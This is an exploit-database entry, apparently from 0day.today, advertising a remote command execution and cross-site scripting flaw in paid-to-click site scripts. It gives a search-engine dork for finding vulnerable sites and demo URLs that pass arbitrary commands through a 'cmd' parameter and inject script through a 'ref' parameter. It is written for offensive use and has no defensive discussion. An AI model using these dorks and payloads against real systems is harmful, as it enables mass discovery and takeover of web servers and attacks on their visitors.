id: 12463
date: 05/30/2010
title: PTC Site's RCE/XSS Vulnerability
author: CrazyMember
cves: 

================================
PTC Site's RCE/XSS Vulnerability
================================


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
@Title: PTC Site's RCE/XSS Vulnerability
@Vendor: http://www.ptcsites4sale.info & and etc...:D
@Author: CrazyMember
@SPC Thanks: XroGuE 4 r3p0r7 :P
@Dork:"intext:Warning: passthru()" "inurl:view=help"
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
@Bug: http://[site]/index.php?view=help&faq=1&ref=[RCE/XSS/HTML]
 
Demo:
 
#http://[site]/index.php?view=help&faq=1&ref=marykarma&cmd=[Your Commond]
#http://[site]/index.php?view=help&faq=1&ref=[Your ScripT]
 
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$



#  0day.today [2023-03-22]  #